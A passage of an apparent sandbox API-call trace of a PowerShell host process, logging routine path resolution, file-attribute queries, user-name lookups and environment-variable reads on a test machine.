	[0229.029] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0x12d3e0 | out: lpFileInformation=0x12d3e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0229.029] SetErrorMode (uMode=0x1) returned 0x1
	[0229.030] CoTaskMemAlloc (cb=0x104) returned 0x3839f0
	[0229.030] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3839f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0229.030] CoTaskMemFree (pv=0x3839f0) 
	[0229.793] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x12d320, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0229.795] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12d190, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0229.795] SetErrorMode (uMode=0x1) returned 0x1
	[0229.795] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x12d3a0 | out: lpFileInformation=0x12d3a0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0229.796] SetErrorMode (uMode=0x1) returned 0x1
	[0229.796] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12d190, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0229.796] SetErrorMode (uMode=0x1) returned 0x1
	[0229.796] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x12d3a0 | out: lpFileInformation=0x12d3a0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0229.796] SetErrorMode (uMode=0x1) returned 0x1
	[0229.796] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12d1a0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0229.796] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x12d090, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0229.796] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x12d190, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0229.796] SetErrorMode (uMode=0x1) returned 0x1
	[0229.796] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x12d3a0 | out: lpFileInformation=0x12d3a0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0229.796] SetErrorMode (uMode=0x1) returned 0x1
	[0229.796] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x12d190, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0229.797] SetErrorMode (uMode=0x1) returned 0x1
	[0229.797] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x12d3a0 | out: lpFileInformation=0x12d3a0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0229.797] SetErrorMode (uMode=0x1) returned 0x1
	[0229.797] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x12d1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0229.797] GetFullPathNameW (in: lpFileName="C:\\Users\\.", nBufferLength=0x105, lpBuffer=0x12d090, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0229.797] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x12d190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0229.797] SetErrorMode (uMode=0x1) returned 0x1
	[0229.797] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0x12d3a0 | out: lpFileInformation=0x12d3a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0229.797] SetErrorMode (uMode=0x1) returned 0x1
	[0229.797] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x12d190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0229.797] SetErrorMode (uMode=0x1) returned 0x1
	[0229.797] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0x12d3a0 | out: lpFileInformation=0x12d3a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0229.797] SetErrorMode (uMode=0x1) returned 0x1
	[0229.798] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x12d1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0229.798] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\.", nBufferLength=0x105, lpBuffer=0x12d090, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0229.798] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x12d190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0229.798] SetErrorMode (uMode=0x1) returned 0x1
	[0229.798] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0x12d3a0 | out: lpFileInformation=0x12d3a0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0229.798] SetErrorMode (uMode=0x1) returned 0x1
	[0229.798] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x12d190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0229.798] SetErrorMode (uMode=0x1) returned 0x1
	[0229.798] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0x12d3a0 | out: lpFileInformation=0x12d3a0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0229.798] SetErrorMode (uMode=0x1) returned 0x1
	[0229.798] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x12d1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0229.798] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\.", nBufferLength=0x105, lpBuffer=0x12d090, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0229.799] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x12d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0229.799] SetErrorMode (uMode=0x1) returned 0x1
	[0229.799] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x12d3e0 | out: lpFileInformation=0x12d3e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0229.799] SetErrorMode (uMode=0x1) returned 0x1
	[0229.799] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x12d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0229.799] SetErrorMode (uMode=0x1) returned 0x1
	[0229.799] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x12d3e0 | out: lpFileInformation=0x12d3e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0229.799] SetErrorMode (uMode=0x1) returned 0x1
	[0229.799] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x12d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0229.799] GetFullPathNameW (in: lpFileName="C:\\Users\\.", nBufferLength=0x105, lpBuffer=0x12d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0229.799] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x12d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0229.800] SetErrorMode (uMode=0x1) returned 0x1
	[0229.800] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0x12d3e0 | out: lpFileInformation=0x12d3e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0229.800] SetErrorMode (uMode=0x1) returned 0x1
	[0229.800] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x12d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0229.800] SetErrorMode (uMode=0x1) returned 0x1
	[0229.800] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0x12d3e0 | out: lpFileInformation=0x12d3e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0229.800] SetErrorMode (uMode=0x1) returned 0x1
	[0229.800] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x12d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0229.800] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\.", nBufferLength=0x105, lpBuffer=0x12d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0229.800] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x12d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0229.800] SetErrorMode (uMode=0x1) returned 0x1
	[0229.800] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0x12d3e0 | out: lpFileInformation=0x12d3e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0229.800] SetErrorMode (uMode=0x1) returned 0x1
	[0229.801] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x12d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0229.801] SetErrorMode (uMode=0x1) returned 0x1
	[0229.801] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0x12d3e0 | out: lpFileInformation=0x12d3e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0229.801] SetErrorMode (uMode=0x1) returned 0x1
	[0229.801] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x12d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0229.801] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\.", nBufferLength=0x105, lpBuffer=0x12d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0229.807] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x12d440, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0229.807] SetErrorMode (uMode=0x1) returned 0x1
	[0229.807] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0x12d6a0 | out: lpFileInformation=0x12d6a0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0229.808] SetErrorMode (uMode=0x1) returned 0x1
	[0229.810] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.810] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.810] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.810] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0238.201] CoTaskMemAlloc (cb=0x804) returned 0x1b98b0c0
	[0238.201] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b98b0c0, nSize=0x12da08 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x12da08) returned 0x1
	[0238.791] CoTaskMemFree (pv=0x1b98b0c0) 
	[0238.791] CoTaskMemAlloc (cb=0x204) returned 0x3631c0
	[0238.791] GetUserNameW (in: lpBuffer=0x3631c0, pcbBuffer=0x12da48 | out: lpBuffer="aETAdzjz", pcbBuffer=0x12da48) returned 1
	[0238.791] CoTaskMemFree (pv=0x3631c0) 
	[0238.793] ReportEventW (hEventLog=0x29e0008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3145078*="Available", lpRawData=0x3144e08) returned 1
	[0239.400] CoTaskMemAlloc (cb=0x104) returned 0x3839f0
	[0239.400] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3839f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0239.400] CoTaskMemFree (pv=0x3839f0) 
	[0239.401] CoTaskMemAlloc (cb=0x104) returned 0x3839f0
	[0239.401] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3839f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0239.401] CoTaskMemFree (pv=0x3839f0) 
	[0239.403] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0239.403] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0239.404] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0239.407] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0239.407] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0239.407] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0239.407] CoTaskMemAlloc (cb=0x104) returned 0x3839f0
	[0239.407] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x3839f0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0239.407] CoTaskMemFree (pv=0x3839f0) 
	[0239.407] CoTaskMemAlloc (cb=0x104) returned 0x3839f0
	[0239.407] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x3839f0, nSize=0x80 | out: lpBuffer="\\Users\\aETAdzjz") returned 0xf
	[0239.407] CoTaskMemFree (pv=0x3839f0) 
	[0239.408] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0239.408] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0239.408] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0239.408] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0239.408] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0239.409] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0239.409] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0239.409] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0239.409] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0239.409] GetCurrentProcessId () returned 0xda4
